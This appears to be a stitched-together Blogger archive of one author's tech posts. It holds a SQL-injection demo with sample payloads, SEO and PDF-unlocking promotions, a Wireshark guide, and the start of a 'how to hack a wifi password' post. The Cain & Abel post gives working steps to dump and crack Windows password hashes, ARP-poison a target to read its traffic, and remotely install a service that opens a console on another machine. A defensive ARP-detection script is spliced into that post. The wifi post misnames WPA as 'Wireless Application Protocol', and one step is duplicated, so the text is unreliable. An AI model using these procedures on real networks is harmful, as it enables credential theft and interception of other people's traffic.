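    if not re.fullmatch(r"[0-9]{1,3}", age):
        raise ValueError("age must be a whole number")
    return names(db, "SELECT username FROM users WHERE age = ?", (int(age),))


def by_name_param(db, name):
    # Prepared/parameterized statement: the value is bound separately and is
    # never parsed as SQL, whatever characters it contains.
    return names(db, "SELECT username FROM users WHERE username = ?", (name,))


# Constructed inputs for the demonstration.
QUOTED_INPUT = "' OR '1'='1"
NUMERIC_INPUT = "0 OR 1=1"

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", by_name_concat(db, QUOTED_INPUT))
    print("escaped+quote:", by_name_escaped(db, QUOTED_INPUT))
    print("escaped, bare:", by_age_escaped(db, NUMERIC_INPUT))
    print("parameterized:", by_name_param(db, QUOTED_INPUT))
```

The unquoted case is the one to watch for in escaping-based code: a value that is escaped but then placed in the query without surrounding quotes is still interpreted as SQL.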
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com5tag:blogger.com,1999:blog-8450897627020793899.post-37165597559522346842012-11-18T10:38:00.000-08:002012-11-27T00:12:14.661-08:00How to get back links for free<div dir="ltr" style="text-align: left;" trbidi="on"><b>25 Backlinks Everyday</b> You<br />
don’t have to add any reciprocal link to your site. Just submit your<br />
form every day and get free backlinks.<br />
<br />
Step 1: <a href="http://www.socialmonkee.com/">Register Here</a>.<br />
<br />
Step 2: Now you have to add a Firefox plugin. [Don’t worry, they<br />
provide a guide.]<br />
<br />
Step 3: As a free member you can get 25 backlinks every day.<br />
That means 750 backlinks per month.<br />
<br />
Step 4: Fill in the submission form every day.<br />
<br />
You can also trace the backlinks, because they provide a<br />
submission report after each submission. Most people do not carry out these<br />
steps.<br />
<br />
Getting backlinks is not enough. You have to inform the search engines<br />
that you are here.<br />
<br />
Step 5: Open your report and copy all the links.<br />
<br />
Step 6: Go to <a href="http://www.pingfarm.com/">Pingfarm</a>. Now paste all the links and press the<br />
mass pinging button.<br />
<br />
Here your job is finished. Do these things every day, and in this way<br />
you will get free backlinks.</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-39583062413303104762012-11-18T10:27:00.001-08:002012-11-27T21:34:55.719-08:00How to copy text from protected PDF<div dir="ltr" style="text-align: left;" trbidi="on"><a href="http://www.bestpdftool.com/pdf-password-remover.html">PDF Password Remover</a> is a professional tool for breaking PDF copy protection. After removing PDF encryption, you can copy text from protected PDF files for reusing.<br />
<br />
Step 1: Import encrypted PDF<br />
After installing and launching the software, click the “Add files” button to batch upload encrypted PDF files to the program.<br />
<br />
Step 2: Output folder setting<br />
Then click the "Customize" button to set the output folder for the converted files.<br />
<br />
Step 3: Remove copy password PDF<br />
Finally, click the "Convert" button to remove the copy password from the PDF files.<br />
<br />
Then, click "Open" to find the converted PDF files, and you can copy text from the formerly protected PDF files and reuse it.<br />
</div>Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com8tag:blogger.com,1999:blog-8450897627020793899.post-25139475322198431522012-11-18T10:08:00.000-08:002012-11-27T21:55:50.615-08:00ARP cache poisoning with cain abel<div dir="ltr" style="text-align: left;" trbidi="on">
1) Start Cain<br />
<br />
2) Click blue + icon on the upper left, note username (ID) and Password and<br />
URL of resource it was saved for on the Protected Storage tab.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVRIU_EfbZudfN0kFg079ZWWodAwy1fbjl67WmCfYfQ1uDPpFgFJX3tpfCC1B-Vghq8-qlAfjSwazh2oH70f_LVaAQunlZTXEabyRUiVtSztrmrr3u3pXo7Tj73ESkg6bRgePMSKk1EMA/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVRIU_EfbZudfN0kFg079ZWWodAwy1fbjl67WmCfYfQ1uDPpFgFJX3tpfCC1B-Vghq8-qlAfjSwazh2oH70f_LVaAQunlZTXEabyRUiVtSztrmrr3u3pXo7Tj73ESkg6bRgePMSKk1EMA/s320/1.PNG" width="320" /></a></div>
<br />
3) To save information from any of the Protected Storage sites:<br />
a. Click on one of the resources<br />
b. Right click and select Export<br />
c. Key in name such as resc1.txt<br />
d. Now, open file using notepad or similar text editor<br />
<br />
4) To delete entry, left click on item, select either Remove or Remove All.<br />
<br />
To find Windows login ID and passwords on a local machine.<br />
<br />
• Create three users on your local machine. Make the accounts as follows:<br />
user1 with password of password, user2 with password of 1password1,<br />
and user3 with password of 123xyz321.<br />
Now proceed to #1 below.<br />
<br />
With the different passwords selected, you will be able to examine how<br />
password difficulty affects auditing and cracking techniques.<br />
<br />
1) Click on Cracker tab<br />
<br />
2) Click on LM & NTLM Hashes<br />
<br />
3) Click on + sign icon on toolbar then Dump NT Hashes from Local machine. *<br />
Note, if you have a SAM file from an NT/win2k/XP machine you can also use<br />
the import option to import from that. *See bottom of lab on remote<br />
installation of Abel to see how you might gain access to a SAM file from a<br />
remote PC.<br />
<br />
4) Click Next<br />
<br />
5) On Guest id, right click and select dictionary attack NTLM. Select Add, then<br />
browse to where cain is installed (possibly in c:\program\files\cain) Then<br />
select wordlists folder and wordlist.txt. Then click Start.<br />
<br />
6) Note options such as As is Password, etc. Also note that you could use a<br />
Brute force attack if you had no luck on a dictionary word from a list file.<br />
However, this would take much longer.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7OLwfsQ8dS67kKrPkNo-nD7IztCoD7DsefLMH6uyt29c2JvpqJOxAKTFjdFmSsJ9iVHpo-dKGfKp24zEy5JhJkGd2xpnhkFojjmJZkeqX8FBot6QukrEu58n7vXCTMYdHacvj58QHwho/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7OLwfsQ8dS67kKrPkNo-nD7IztCoD7DsefLMH6uyt29c2JvpqJOxAKTFjdFmSsJ9iVHpo-dKGfKp24zEy5JhJkGd2xpnhkFojjmJZkeqX8FBot6QukrEu58n7vXCTMYdHacvj58QHwho/s320/2.PNG" width="320" /></a></div>
<br />
<b>Using APR</b> – ARP Poison Routing.<br />
Theory -- On an Ethernet/IP network, when host A wants to send a packet to<br />
host B, it must know the MAC or physical address of the machine and IP<br />
address. It also needs to know the application layer protocol (IP) address, but<br />
the physical MAC is required for construction of the Ethernet frame. Review<br />
the OSI model if you are unclear on these concepts. In short we have to have<br />
both.<br />
Once it knows the MACs of the machines on the network, it keeps them stored<br />
in an ARP cache table. However, before it can “know” it has to query the<br />
network to find out the addresses. A host does this by sending out an ARP<br />
request on broadcast to FFFFFFFFFFFF. Only the station with the specified IP<br />
will reply in unicast with an ARP reply packet to the requesting station with its<br />
MAC. Now host A has an updated table entry for host B and it will<br />
communicate now in unicast directly to it by using the MAC of B in the<br />
Ethernet frame. ARP request and reply packets are only sent if the host<br />
doesn't know the destination machine's MAC. Again, once it is learned, the<br />
cache is used. This is a key point in why APR works.<br />
<br />
<b>How APR works</b> – ARP Poison Routing uses the stored cache as a way to reroute<br />
or re-direct packets from a target, to an intermediary machine, then<br />
forward to the host, thus the middle machine “sees” all traffic between target<br />
and host, even if on a switched LAN. First the target MAC address must be<br />
established, then the APR feature “poisons” the cache of the target by forcing<br />
a cache update with the path re-routed so that the middle machine forwards<br />
traffic to and from host and target. The middle machine can now examine<br />
packets with a sniffer such as Ethereal, Nmap, or others.<br />
<br />
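A defender's view of the caching behaviour described above, as an added example that is not part of the original post: because hosts accept ARP replies into their cache, a monitor can flag replies nobody asked for, IP-to-MAC bindings that change, and one MAC answering for several IPs. The input format, the addresses and the 2-second window are constructed for the illustration.

```python
import csv
import io

# Constructed sample of ARP traffic (not a real capture).
# Columns: seconds, operation, sender IP, sender MAC, target IP
SAMPLE = """\
0.0,request,192.168.1.10,aa:aa:aa:aa:aa:10,192.168.1.1
0.1,reply,192.168.1.1,aa:aa:aa:aa:aa:01,192.168.1.10
5.0,request,192.168.1.1,aa:aa:aa:aa:aa:01,192.168.1.10
5.1,reply,192.168.1.10,aa:aa:aa:aa:aa:10,192.168.1.1
30.0,reply,192.168.1.1,cc:cc:cc:cc:cc:66,192.168.1.10
30.0,reply,192.168.1.10,cc:cc:cc:cc:cc:66,192.168.1.1
32.0,reply,192.168.1.1,cc:cc:cc:cc:cc:66,192.168.1.10
"""

REQUEST_WINDOW = 2.0  # seconds a request counts as "pending" (assumed value)


def detect(text, window=REQUEST_WINDOW):
    """Return a list of (time, kind, sender_ip, sender_mac) alerts."""
    bindings = {}  # IP -> MAC first learned for it (the baseline)
    mac_ips = {}   # MAC -> set of IPs it has claimed
    pending = {}   # (asking IP, asked-for IP) -> time of the request
    alerts = []

    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        t, op, sip, smac, tip = float(row[0]), row[1], row[2], row[3].lower(), row[4]

        if op == "request":
            pending[(sip, tip)] = t
        elif op == "reply":
            # A normal reply answers a recent request from the target for
            # the sender's IP. Anything else was not asked for.
            asked = pending.pop((tip, sip), None)
            if asked is None or t - asked > window:
                alerts.append((t, "unsolicited-reply", sip, smac))
        else:
            continue

        # Requests and replies both advertise the sender's IP/MAC pair.
        known = bindings.get(sip)
        if known is None:
            bindings[sip] = smac
        elif known != smac:
            # Baseline is kept, so repeated poisoning keeps alerting.
            alerts.append((t, "binding-changed", sip, smac))

        claimed = mac_ips.setdefault(smac, set())
        claimed.add(sip)
        if len(claimed) > 1:
            # The "middle machine" pattern: one MAC speaking for both ends.
            alerts.append((t, "mac-claims-multiple-ips", sip, smac))

    return alerts


def suspects(alerts):
    """MAC addresses that appear in any alert."""
    return {mac for _, _, _, mac in alerts}


if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Legitimate events such as a replaced network card or a failover pair also trigger these alerts, so treat them as leads to check; on managed switches, Dynamic ARP Inspection enforces the same binding check in the network itself.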
<b>Instructions to use APR</b>:<br />
** Before you try this, you must make sure that WinPcap is properly bound to<br />
your NIC. Select Configure and make sure you see your adapter(s) listed.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGSmL7C4dVttmbZixKpjB3BDaUBmQ6HroT7yOQl4vrbsZxbfLscob_F7AjJxW742gj_f-ehEcsIIkb8AzzDPGQqHo-_CI3Q6kxG88OVObTc-kkU-oP1OHiTZnn-gYCZxWqsvZhJPWvJXk/s1600/3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGSmL7C4dVttmbZixKpjB3BDaUBmQ6HroT7yOQl4vrbsZxbfLscob_F7AjJxW742gj_f-ehEcsIIkb8AzzDPGQqHo-_CI3Q6kxG88OVObTc-kkU-oP1OHiTZnn-gYCZxWqsvZhJPWvJXk/s320/3.PNG" width="320" /></a></div>
<br />
At the main screen, select Configure, then click your network adapter, then<br />
Apply and OK.<br />
<br />
1) Click to enable both Sniffer and APR (Left of the + ). <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeN1KbkCvEIqUsUwm5N4opX9OhrXkdxy-a4A6XjRJCQXuYhQU5GLR3UXYC4Hl4MHI8VFe6b79yfOKnPdBGn8uOVNl-HWSqzd7TfGn757RvPUI0PaxmC73SwuWqp8JF097sORBH_Fx-mM/s1600/4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXeN1KbkCvEIqUsUwm5N4opX9OhrXkdxy-a4A6XjRJCQXuYhQU5GLR3UXYC4Hl4MHI8VFe6b79yfOKnPdBGn8uOVNl-HWSqzd7TfGn757RvPUI0PaxmC73SwuWqp8JF097sORBH_Fx-mM/s320/4.PNG" width="320" /></a></div>
<br />
2) Click on +, then Range. Range for your network (based on adapter you<br />
chose) is displayed. Click OK to start scanning.<br />
<br />
3) After 100% you will see IP address, MAC, and OUI fingerprint of devices in<br />
range.<br />
4) Now click on APR icon to enable it.<br />
<br />
5) Click on + and select IP address to poison, then OK.<br />
<br />
6) Now you should see it change from Idle to Poisoning.<br />
<br />
7) IP connections should appear from target and spoofing computer (your<br />
computer).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1_pYIKVSkeFxaNQ_EmvQ9WOmmtfQhGVPWv0Dh9tfHCoTNkLKcbrv5qpLk9_PfetZUVHigPzFyclbqYXGHbaCpjodYbM6UZHeNytYM0XB3xSb5kzCp2CcIJc4n5-pitvhM-MqNISohdo/s1600/5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgl1_pYIKVSkeFxaNQ_EmvQ9WOmmtfQhGVPWv0Dh9tfHCoTNkLKcbrv5qpLk9_PfetZUVHigPzFyclbqYXGHbaCpjodYbM6UZHeNytYM0XB3xSb5kzCp2CcIJc4n5-pitvhM-MqNISohdo/s320/5.PNG" width="320" /></a></div>
<br />
8) So, what we have now, looking at C3, is the target IP on the left, where they<br />
were going on the right. All of this passing harmlessly through the middle<br />
PC.<br />
<br />
9) For better analysis of this traffic, and perhaps text strings that have been<br />
sent from the target, etc. (e.g. They connected to Google, but what did<br />
they search for?) We will run a sniffer on the middle computer.<br />
<br />
10) Start Ethereal, select Capture, then select the same interface adapter you<br />
selected in Cain. Then select OK. You are trying to capture the packets<br />
being forwarded to and from your machine via ARP session.<br />
<br />
11) Stop the capture after connecting to google and searching for items such as<br />
“vacation villas”, or “cheap air fare”. Your machine is now analyzing the<br />
traffic from a target as all of its traffic is rerouted through yours. Note in<br />
Figure C4 we see all traffic listed in the top window of Ethereal (examine<br />
that we see our connection to Google).<br />
<br />
12)Click the Protocol field to organize the list, then scroll down to HTTP and<br />
look for GET /search? Here we see in Figure C5 that the user was<br />
searching on vacation villas (vacation+villa).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk15cAbK3nLkwnTtDSPhCKlrTizKywJ-9AYLopMPacZ0Vn8MMvn213xmr3CjqDvb_YUAaBTBFg2-3pXO4ItivCp8rUdW8RH8eC9MQ6f8lq_YOx8I04H5ts0LonD6n2QjEtVv_oCjvys1M/s1600/12.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk15cAbK3nLkwnTtDSPhCKlrTizKywJ-9AYLopMPacZ0Vn8MMvn213xmr3CjqDvb_YUAaBTBFg2-3pXO4ItivCp8rUdW8RH8eC9MQ6f8lq_YOx8I04H5ts0LonD6n2QjEtVv_oCjvys1M/s320/12.PNG" width="320" /></a></div>
<br />
13)Click the Protocol field to organize the list, then scroll down to HTTP and<br />
look for GET /search? Here we see in Figure C5 that the user was<br />
searching on vacation villas (vacation+villa).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmZg2dO20b2n1V5RreYQTGx_yfd1qoAiBv9IlFJ9Qk08IsOUqwY1caq8uuJD2Dlth6Hsqc2HBAB4uVVeB8Yb3ZJ0ymdukG5xaIYrQW-zJa4W7807mD5yE0ykLIWqGdboEwde-cbZMdSs/s1600/13.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmZg2dO20b2n1V5RreYQTGx_yfd1qoAiBv9IlFJ9Qk08IsOUqwY1caq8uuJD2Dlth6Hsqc2HBAB4uVVeB8Yb3ZJ0ymdukG5xaIYrQW-zJa4W7807mD5yE0ykLIWqGdboEwde-cbZMdSs/s320/13.PNG" width="320" /></a></div>
<br />
14)When finished select Tools, Disconnect, Disconnect All.<br />
<b><br />
What is Abel?</b> How can I install it?<br />
Abel is an NT service composed of two files: "Abel.exe" and "Abel.dll". These<br />
files are copied by the installation package into the program's directory but the<br />
service IS NOT automatically installed. Abel can be installed locally or<br />
remotely (using Cain); either way, you need Administrator privileges to do that.<br />
<br />
LOCAL INSTALLATION:<br />
1) Copy the files Abel.exe and Abel.dll into the %WINNT% directory (e.g.<br />
C:\WINNT)<br />
<br />
2) Launch Abel.exe to install the service (not automatically started)<br />
<br />
3) Start the service using the Service Manager<br />
<br />
REMOTE INSTALLATION (most reliable on wired network):<br />
1) Use the "Network TAB" in Cain and choose the remote computer where Abel<br />
will be installed<br />
<br />
2) Right click on the computer icon in the tree and select "Connect As"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbJOuL8OyOu5JH6CobVuxqaF7H0JoTGg4TC5jr-lpEqyurF3TCy2U_U4P4iTiwrGgyxHGuPWdAr9d2YTLseB4cqIKflQUmW2cmn33vyMMaDUQeDvoqSLRuiJaHLYvPhxrc92eR7aoaVTk/s1600/7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbJOuL8OyOu5JH6CobVuxqaF7H0JoTGg4TC5jr-lpEqyurF3TCy2U_U4P4iTiwrGgyxHGuPWdAr9d2YTLseB4cqIKflQUmW2cmn33vyMMaDUQeDvoqSLRuiJaHLYvPhxrc92eR7aoaVTk/s320/7.PNG" width="320" /></a></div>
<br />
4) Provide Administrator credentials for the remote machine.<br />
<br />
5) Once connected right click on the "Services" icon and select "Install Abel"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXq-aFbHcCHp05mv3c_zXJiNM2Quj-T90NArfoeZuhnlREd-0EXk75XOs38rM3_nxX09h5tjQAPweKfVB9nG4YjMYm2-Kk19hlsBtImiokq8vUlC-zskvPQ5AeUwnuqT4J2CMPfdqBnw/s1600/8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzXq-aFbHcCHp05mv3c_zXJiNM2Quj-T90NArfoeZuhnlREd-0EXk75XOs38rM3_nxX09h5tjQAPweKfVB9nG4YjMYm2-Kk19hlsBtImiokq8vUlC-zskvPQ5AeUwnuqT4J2CMPfdqBnw/s320/8.PNG" width="320" /></a></div>
<br />
6) The two files "Abel.exe" and "Abel.dll" will be copied into the remote<br />
machine, the service will be installed<br />
and started automatically.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM0c7UOcg3qQQEUZaoW7jIc-P2fgnVw8B4U6tnZ5MGl1B_5gxI2A0provlQhM93fk0GSVk03NW-fxVZsxxgJTK48SixBjjn8M_3TWirrhXWZ1P-yKCJtzttcvhe2EDJbZCvkea4HxuKvQ/s1600/9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM0c7UOcg3qQQEUZaoW7jIc-P2fgnVw8B4U6tnZ5MGl1B_5gxI2A0provlQhM93fk0GSVk03NW-fxVZsxxgJTK48SixBjjn8M_3TWirrhXWZ1P-yKCJtzttcvhe2EDJbZCvkea4HxuKvQ/s320/9.PNG" width="320" /></a></div>
<br />
7) Once installed on the remote computer, note that among other things, you<br />
can bring up a console prompt on the remote machine, examine password<br />
Hashes, etc.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com6tag:blogger.com,1999:blog-8450897627020793899.post-3032535388964772582012-09-08T22:16:00.002-07:002012-11-27T21:46:10.268-08:00How to reduce OS selection time in dual boot setup<div dir="ltr" style="text-align: left;" trbidi="on">
If your PC is in a dual-boot setup, you might have noticed that it gives you 30 seconds to make a selection if you are using any Windows system. This is because the Windows boot manager uses 30 seconds as its default timeout. You can change it by editing the boot manager file, which is possible through the 'System Configuration Utility' window. The method shown here only works for the Windows boot manager; if you have a Linux OS installed alongside Windows, then it uses another method.<br />
<br />
Open 'run' dialogue and type 'msconfig'<br />
<br />
click on 'boot' tab<br />
<br />
Here edit the 'Timeout' field, as default value is 30. You can decrease and increase it according to your need<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-UXuSQvg2lHs/T0dLy-W2DAI/AAAAAAAAALQ/Uoiu2S93GoE/s1600/msconfig.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://4.bp.blogspot.com/-UXuSQvg2lHs/T0dLy-W2DAI/AAAAAAAAALQ/Uoiu2S93GoE/s320/msconfig.jpg" width="320" /></a></div>
By editing options in msconfig you are modifying the boot file. In XP you can also do it directly by unhiding boot.ini, which is in the root directory of C:, and opening it in Notepad.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-RyjHZgkrVhI/T0dN2l0U8wI/AAAAAAAAALY/NxnJei3RVbQ/s1600/boot.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://3.bp.blogspot.com/-RyjHZgkrVhI/T0dN2l0U8wI/AAAAAAAAALY/NxnJei3RVbQ/s320/boot.JPG" width="320" /></a></div>
As you can see here, many things can be edited, including the timeout field value.<br />
<br />
You can also edit boot.ini from cmd. Open cmd and type:<br />
<br />
cd C:\<br />
<br />
attrib -r -a -s -h boot.ini<br />
<br />
edit boot.ini<br />
<br />
and edit as you want, or search for more editing commands in cmd.</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com4tag:blogger.com,1999:blog-8450897627020793899.post-85656846062874272472012-09-04T09:03:00.000-07:002012-12-11T19:45:43.076-08:00How to use wireshark to Capture, Filter and Inspect Packets<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxU83m6zYdXYTij_UZeBVia-aooCDeK6UhJrkPL8EViNvHuBmLy_a6HKbmoaDU9c2NLYKB_y3PfHBZJh2lI_WMlYxtTjKswxhuH2Mh-_E3l9oBgK7z7LE60ykiS6k2EcADMmVuXpLcSg/s1600/Wireshark_Icon-150x150.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSxU83m6zYdXYTij_UZeBVia-aooCDeK6UhJrkPL8EViNvHuBmLy_a6HKbmoaDU9c2NLYKB_y3PfHBZJh2lI_WMlYxtTjKswxhuH2Mh-_E3l9oBgK7z7LE60ykiS6k2EcADMmVuXpLcSg/s1600/Wireshark_Icon-150x150.png" /></a></div>
<b>Start Wireshark</b><br />
On a Linux or Unix environment, select the Wireshark or Ethereal entry in the desktop environment's menu, or run "wireshark" (or "ethereal") from a root shell in a terminal emulator.<br />
Note that on Un*x systems, a non-GUI version of Wireshark called "tshark" (or "tethereal") may be available as well, but its use is beyond the scope of this document.<br />
<br />
Configure Wireshark<br />
<br />
After starting Wireshark, do the following:<br />
<br />
-Select Capture | Interfaces<br />
<br />
-Select the interface on which packets need to be captured.<br />
<br />
-If capture options need to be configured, click the Options button for the chosen interface. Note the following recommendations for traces that are to be analysed by Novell Technical Services:<br />
Capture packet in promiscuous mode: This option allows the adapter to capture all traffic not just traffic destined for this workstation. It should be enabled.<br />
<br />
Limit each packet to: Leave this option unset. Novell Support will always want to see full frames.<br />
<br />
Filters: Generally, Novell Support prefers an unfiltered trace. For documentation on filters, please refer to TID 10084702 - How to configure a capture filter for Ethereal (formerly NOVL90720).<br />
<br />
-Capture file(s): This allows a file to be specified to be used for the packet capture. By default Wireshark will use temporary files and memory to capture traffic. Specify a file for reliability.<br />
<br />
-Use multiple files, Ring buffer with: These options should be used when Wireshark needs to be left running, capturing data for a long period of time. The number of files is configurable. When a file fills up, it will wrap to the next file. The file name should be specified if the ring buffer is to be used.<br />
<br />
-Stop capture after xxx packet(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Stop capture after xxx kilobyte(s) captured: Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Stop capture after xxx second(s): Novell Technical Support would most likely never use this option. Leave disabled.<br />
<br />
-Update list of packets in real time: Disable this option if the problem that's being investigated is occurring on the same workstation as where Wireshark is running.<br />
<br />
-Automatic scrolling in live capture: Wireshark will scroll the window so that the most current packet is displayed.<br />
<br />
-Hide capture info dialog: Disable this option so that you can view the count of packets being captured for each protocol.<br />
<br />
-Enable MAC name resolution: Wireshark contains a table to resolve MAC addresses to vendors. Leave enabled.<br />
<br />
-Enable network name resolution: Wireshark will issue DNS queries to resolve IP host names. It will also attempt to resolve network names for other protocols. Leave disabled.<br />
<br />
-Enable transport name resolution: Wireshark will attempt to resolve transport names. Leave disabled.<br />
<br />
Now click the Start button to start the capture.<br />
<br />
Recreate the problem. The capture dialog should show the number of packets increasing. If not, then stop the capture. Examine the interface list and pick the one that is not associated with the WANIP. It will probably be a long alpha-numeric string. If packets are still not being captured, try removing any filters that have been defined.<br />
<br />
Once the problem which is to be analysed has been reproduced, click on Stop. It might take a few seconds for Wireshark to display the packets captured.<br />
<br />
If the destination address is always displayed as FFFFFFFF (IPX) or always ends in .255 (IP) then all that has been captured is broadcast traffic. This is a useless trace.<br />
<br />
This usually occurs when another machine is being traced (to start the trace while the target machine is powered off, in order to capture the bootup process). The capture setup needs to be reconsidered - port mirroring on the switch may need to be set up, or a dumb hub may need to be used to make the traffic reach the sniffing system. (Some devices advertised as "hubs" are in fact switches that may have the intelligence to prevent the workstations from seeing each other's packets; with these, getting a good trace may not be possible)<br />
<br />
Save the packet trace in any supported format. Just click on the File menu option and select Save As. By default Wireshark will save the packet trace in libpcap format. This is a filename with a .pcap extension. Use this default for files sent to Novell.<br />
<br />
Create a trace_info.txt file with the IP and MAC address of the machines that are being traced as well as any pertinent information, such as:<br />
<br />
<ul style="text-align: left;">
<li>What is the problem? (when did it start? steps to reproduce? any other pertinent information)</li>
<li>What steps were traced?</li>
<li>Give names of the servers and files being accessed.</li>
<li>If analysis of the trace has already been attempted, please provide Novell Support with analysis notes. For example: Packets 1-30 are boot. Packets 31-500 are login. Packets 501 to 1,000 is my application loading. Packet 1,001 to 1,500 is me saving my file. The error occurred at approximately packet 1,480.</li>
<li>Give the MAC addresses of hardware involved? (Workstation, servers, printers ...)</li>
<li>What is the workstation OS and configuration?</li>
<li>What version of client software is running?</li>
<li>If it works with one version of the client (or a particular server patch), then get a trace of it working, and a trace of it not working.</li>
<li>For Novell Client issues: Are there any client patches loaded?</li>
<li>For NetWare servers: What version of NetWare (and other relevant products i.e. ZEN or NDPS) are running on the server?</li>
<li>What patches have been applied?</li>
<li>What is the configuration of the network? Are there routers involved? If so, what kind of routers?</li>
</ul>
</div>
Varun Guptahttp://www.blogger.com/profile/10283994426956915590noreply@blogger.com8tag:blogger.com,1999:blog-8450897627020793899.post-81937189938510268702012-09-03T07:33:00.001-07:002012-11-27T21:55:50.637-08:00How to hack a wifi password using aircrack<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRPId90uWXoyfW0q3vr4Pza9VXcxLNoHDbfZRNAtaUUaWjbaRaVLBa1bMWwWNa9RSME_GSzDh8fWL8XBh3fLe3gQHR8jqx_DgXnosuloupXtl1eYV4WFgxIJ_oJSrHwfM4JOsuEYdBcs/s1600/WiFi-Hacking-Risk.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGRPId90uWXoyfW0q3vr4Pza9VXcxLNoHDbfZRNAtaUUaWjbaRaVLBa1bMWwWNa9RSME_GSzDh8fWL8XBh3fLe3gQHR8jqx_DgXnosuloupXtl1eYV4WFgxIJ_oJSrHwfM4JOsuEYdBcs/s320/WiFi-Hacking-Risk.jpg" width="320" /></a></div>
First of all you need to scan for available wireless networks.<br />
<br />
You can use “NetStumbler” or "Kismet" for Windows and Linux, and KisMac for Mac.<br />
<br />
It’ll also show how the Wi-fi network is encrypted. The two most common encryption techniques are:<br />
<br />
1) WEP (Wired Equivalent Privacy)<br />
<br />
2) WAP(Wireless Application Protocol)<br />
<br />
WEP allows a hacker to crack a WEP key easily, whereas WAP is currently the most secure and best option to secure a Wi-Fi network.<br />
<br />
It can’t be cracked as easily as WEP, because the only way to retrieve a WAP key is to use a brute-force attack or dictionary attack.<br />
<br />
How to Crack WEP<br />
<br />
To crack WEP we will be using a live Linux distribution called BackTrack.<br />
<br />
BackTrack has lots of preinstalled software, but this time<br />
the tools we will be using on BackTrack are:<br />
<br />
a)Kismet – a wireless network detector<br />
b)airodump – captures packets from a wireless router<br />
c)aireplay – forges ARP requests<br />
d)aircrack – decrypts the WEP keys<br />
<br />
Follow the steps One by One<br />
<br />
1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.<br />
<br />
